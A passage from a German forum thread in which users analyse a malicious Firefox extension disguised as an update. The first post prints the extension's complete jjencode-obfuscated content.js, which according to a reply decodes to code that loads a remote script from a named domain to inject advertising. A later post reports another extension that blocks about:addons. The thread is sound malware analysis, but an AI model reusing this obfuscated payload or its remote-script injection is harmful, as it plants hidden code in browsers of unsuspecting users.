seltsamer Code in Malware Erweiterung

  • Ich habe mir absichtlich mal eine Erweiterung von so einer Malware Seite geladen. Sie gibt vor ein Firefox Update wäre nötig usw.
    Ich lade mir gerne so etwas herunter (ohne zu installieren und wenn dann nur in einer VM) um diese zu entpacken und mir den darin liegenden Code mit Notepad++ anzusehen und vielleicht etwas Aufschluss darüber zu bekommen was die Erweiterung macht.
    So wollte ich es auch mit dieser machen.
    Die Datei besteht eigentlich nur aus
    META-INF (Ordner)
    background.js
    content.js
    manifest.json

    In der content.js ist nur seltsamer Code zu finden. :shock: und zwar dieser hier:

    Code
    $$=~[];$$={___:++$$,$$$$:(![]+"")[$$],__$:++$$,$_$_:(![]+"")[$$],_$_:++$$,$_$$:({}+"")[$$],$$_$:($$[$$]+"")[$$],_$$:++$$,$$$_:(!""+"")[$$],$__:++$$,$_$:++$$,$$__:({}+"")[$$],$$_:++$$,$$$:++$$,$___:++$$,$__$:++$$};$$.$_=($$.$_=$$+"")[$$.$_$]+($$._$=$$.$_[$$.__$])+($$.$$=($$.$+"")[$$.__$])+((!$$)+"")[$$._$$]+($$.__=$$.$_[$$.$$_])+($$.$=(!""+"")[$$.__$])+($$._=(!""+"")[$$._$_])+$$.$_[$$.$_$]+$$.__+$$._$+$$.$;$$.$$=$$.$+(!""+"")[$$._$$]+$$.__+$$._+$$.$+$$.$$;$$.$=($$.___)[$$.$_][$$.$_];$$.$($$.$($$.$$+"\""+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"()\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+$$.__+"(\\\"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+"\\\")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"."+$$.__+"\\"+$$.__$+$$.$_$+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+"(\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+$$.$$$$+"\\"+$$.$__+$$.___+"(\\"+$$.__$+$$.$_$+$$.__$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$_$_+$$.__+$$.$$$_+"\\"+$$.__$+$$.___+$$.$_$+(![]+"")[$$._$_]+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"('\\"+$$.__$+$$.$$_+$$._$$+$$.$$__+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$.___+$$.__+"');\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+".\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$__+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"`${"+$$.$_$_+$$.__+$$._$+$$.$_$$+"(\\\"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$$$+$$.__$+$$.$__$+$$.__+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$._$_+$$.$$_+$$.$__+$$.$$_$+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$._$$+$$.__$+$$._$_+$$.$__$+$$._+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.$_$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$_$$+"\\"+$$.__$+$$._$_+$$._$$+$$.$___+"\\"+$$.__$+$$.$$$+$$.___+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+$$.$$__+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$._$$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.__$+$$._$_+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.__$+$$.$$_+"\\"+$$.__$+$$.$_$+$$._$_+"\\"+$$.__$+$$._$_+$$.$_$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$._$_+$$.$$$+"\\"+$$.__$+$$.__$+$$.__$+"\\"+$$.__$+$$.$$$+$$._$_+"\\"+$$.__$+$$._$$+$$._$_+"\\"+$$.__$+$$.___+$$.$$$+"\\"+$$.__$+$$.___+$$.$_$+$$._+$$.$_$_+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.__$+$$.$_$+"=\\\")}`;\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$_$+$$._$+$$.$$__+$$._+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"."+$$.$_$$+$$._$+$$.$$_$+"\\"+$$.__$+$$.$$$+$$.__$+"."+$$.$_$_+"\\"+$$.__$+$$.$$_+$$.___+"\\"+$$.__$+$$.$$_+$$.___+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.___+$$._$$+"\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$_$+$$.__$+(![]+"")[$$._$_]+$$.$$_$+"(\\"+$$.__$+$$.$$_+$$._$$+");\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.$__+$$.___+$$.$$$_+(![]+"")[$$._$_]+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+$$.$_$_+$$.$$_$+$$.$$_$+"\\"+$$.__$+$$.___+$$.$_$+"\\"+$$.__$+$$.$$_+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"(\\\"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"\\\",\\"+$$.$__+$$.___+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.$__+$$.___+"("+$$.$$$_+")\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$_+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+"\\"+$$.__$+$$.__$+$$.$_$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+":\\"+$$.$__+$$.___+$$.$$$_+"."+$$.$$_$+$$.$_$_+$$.__+$$.$_$_+".\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$$+$$._$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$_$+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+".\\"+$$.__$+$$.$_$+$$.___+"\\"+$$.__$+$$.$$_+$$._$_+$$.$$$_+$$.$$$$+"\\"+$$.$__+$$.___+"=\\"+$$.$__+$$.___+"\\\"#"+$$.$$_$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$$_+"\\\";\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.__$+$$.___+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"\\"+$$.__$+$$._$_+$$.$__+"\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$_$+$$.$$$_+$$._$+$$._+$$.__+"("+$$.$$$$+$$._+"\\"+$$.__$+$$.$_$+$$.$$_+$$.$$__+$$.__+"\\"+$$.__$+$$.$_$+$$.__$+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"(){\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$_$$+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$.$$$+"\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+".\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+$$.$_$_+"\\"+$$.__$+$$.$__+$$.$$$+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+$$.$$__+$$.$_$_+(![]+"")[$$._$_]+".\\"+$$.__$+$$.$$_+$$._$$+$$.$$$_+$$.__+"({\\"+$$.__$+$$.$_$+$$.__$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$.__+$$.$_$_+(![]+"")[$$._$_]+(![]+"")[$$._$_]+$$.$$$_+$$.$$_$+":"+$$.__$+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.$__+$$.___+$$.$_$+$$.___+$$.___+"\\"+$$.$__+$$.___+"*\\"+$$.$__+$$.___+$$.__$+");\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"}\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"},\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"("+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.$__+$$.___+"=>\\"+$$.$__+$$.___+"{\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+$$.$$__+$$._$+"\\"+$$.__$+$$.$_$+$$.$$_+"\\"+$$.__$+$$.$$_+$$._$$+$$._$+(![]+"")[$$._$_]+$$.$$$_+"."+(![]+"")[$$._$_]+$$._$+"\\"+$$.__$+$$.$__+$$.$$$+"('\\"+$$.__$+$$.__$+$$.$__+"\\"+$$.__$+$$._$_+$$._$$+"::"+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+"',\\"+$$.$__+$$.___+$$.$$$_+"\\"+$$.__$+$$.$$_+$$._$_+"\\"+$$.__$+$$.$$_+$$._$_+$$._$+"\\"+$$.__$+$$.$$_+$$._$_+")\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"\\"+$$.$__+$$.___+"});\\"+$$.__$+$$.$_$+"\\"+$$.__$+$$._$_+"})();"+"\"")())();


    Kann mir jemand erklären was das ist? verschlüsselter Code? kann man diesen entschlüsseln? Wenn ja, wie?

    Hilfe auch im deutschsprachigen Matrix-Chat möglich oder im IRC-Chat
    Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

  • Suchwort für die Suchmaschine deiner Wahl wäre jjencode. Einen Decoder findest Du z.B. hier:
    https://github.com/jacobsoo/Decoder-JJEncode

    Das von dir gepostete Beispiel wird also zu:

    Dabei ist der base64-Code diese URL: //http://meextffcon.com/1c70c2612b656eb3da.js
    Die Script-Datei wiederum lädt scheinbar vor allem Werbung von cdnpps.us nach, aber ich habe mir die jetzt nicht intensiver angeschaut. Sprich: Das AddOn produziert zusätzliche Werbung auf den besuchten Seiten, womit der böse Bube also "nur" hinter Werbeeinnahmen her ist.

    Greetz,
    DF

  • Das hier ist zwar gelöst. Aber ich hefte es trotzdem mal hier ran. Ich fand gerade eine Erweiterung, die verhindert, dass man about:addons aufrufen kann. Sobald man das macht, landet man auf google.com.
    Ich frage mich wie das möglich sein kann :o Dachte so etwas wäre mit WebExtensions gar nicht möglich :-??
    Somit gibts auch keinen Weg diese Erweiterung wieder zu deinstallieren (ok, gut händisch gehts natürlich oder auch mit Firefox zurücksetzen oder im SafeMode deinstallieren)

    Hilfe auch im deutschsprachigen Matrix-Chat möglich oder im IRC-Chat
    Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

    2 Mal editiert, zuletzt von Zitronella (17. Juli 2018 um 22:01)


  • Ich bin nur an euren Ergebnissen interessiert... :P

    ;)

    Grundsätzlich macht das AddOn das Übliche: Es schickt Anwender auf eine andere Suchseite und verdient damit Geld, mehr nicht. Ja, lästig, aber für den Anwender im Grunde ungefährlich.

    Nett ist aber das Abfangen von about:addons. Der Code dazu steckt in der background.js ganz am Ende:

    Code
